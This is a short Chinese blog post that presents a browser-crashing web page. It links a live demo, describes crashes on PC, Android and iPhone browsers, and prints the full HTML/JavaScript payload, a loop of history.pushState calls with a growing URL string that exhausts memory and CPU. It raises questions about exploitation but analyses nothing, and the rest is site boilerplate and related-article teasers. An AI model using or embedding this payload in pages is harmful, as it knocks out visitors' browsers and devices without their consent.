让浏览器爆炸

Demo:https://www.yuncaioo.com/demo/baozha/

接来下会发生什么?

如果你是PC端用户,点开链接以后,电脑CPU内存极有可能一路狂飙直至浏览器崩溃卡死! 如果你是移动端(安卓、iPhone)用户,点开链接以后你的浏览器会闪退!在微博、微信客户端点开链接同样会闪退,iPhone用Safari打开之后链接之后,手机注销重启了……

这是Bug还是0day?

为什么会有这一现象?

如何实现的?

有哪些比较有意思的利用姿势?

完整代码:

<html>
<body>
<script>
var total="";
for (var i=0;
i<1000000;i++)
{
total= total+i.toString();
history.pushState(0,0,total);
}
</script>
</body>
</html>

原创文章采用CC BY-NC-SA 4.0协议进行许可,转载请注明转载自:让浏览器爆炸

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

相关文章

来自专栏张伟博客

多合一收款二维码合并原理及源码-支持支付宝、微信、QQ

最近去超市看到好多商户一个二维码同时支持支付宝、微信、QQ扫描付款,所以回来自己上网研究了一下。整理了一个现成的源码,有需要的朋友可以下载自己研究下。

1213
来自专栏源哥的专栏

"struts中文问题","struts国际化问题"的终极解决方案[转载]

Java本身就支持多国语言编码,不需要写任何程序,可以很简单的 实现。 秘诀就是两点:

831
来自专栏cloudskyme

jbpm5.1介绍(12)

GWT是什么 如今,编写网络应用程序是一个单调乏味且易于出错的过程。开发人员可能要花费 90% 的时间来处理浏览器行话。此外,构建、重复使用以及维护大量 Ja...

3324
来自专栏Python数据科学

3款你必须知道的爬虫工具

本篇博主将和大家分享几个非常有用的爬虫小工具,这些小工具在实际的爬虫的开发中会大大减少你的时间成本,并同时提高你的工作效率,真的是非常使用的工具。

501
来自专栏黄Java的地盘

提高代码质量——使用Jest和Sinon给已有的代码添加单元测试

在日常的功能开发中,我们的代码测试都依赖于自己或者QA进行测试。这些操作不仅费时费力,而且还依赖开发者自身的驱动。在开发一些第三方依赖的库时,我们也没有办法给第...

440
来自专栏jeremy的技术点滴

使用hexo写博文

4984
来自专栏java一日一条

这十二行代码是如何让浏览器爆炸的?

今天刷推特的时候发现 Cyber Security@cyber__sec 的推文让人眼前一亮:

442
来自专栏知晓程序

开发 | 无需后端编码,10 分钟教你实现一个朋友圈小程序

虽然目标功能的业务逻辑并不复杂,但其背后需要一套靠谱的权限控制系统,也意味着需要一个完整的后端服务系统来支持运行。

1354
来自专栏从零开始学自动化测试

appium+python自动化41-微信公众号

本篇介绍如何在微信公众号上自动化测试,以操作我的个人公众号:yoyoketang为例,没关注的,先微信关注了,再跟着操作

1312
来自专栏ytkah

微信小程序开发教程第九章:微信小程序拍照收纳开发以及删除名片等

第九章:微信小程序拍照收纳开发以及删除名片等 还是先来看看我们今天的主题——拍照收纳。 拍照收纳分为:上传图片/识别名片、手动填写名片信息两个路径,这里只说下拍...

2968

扫码关注云+社区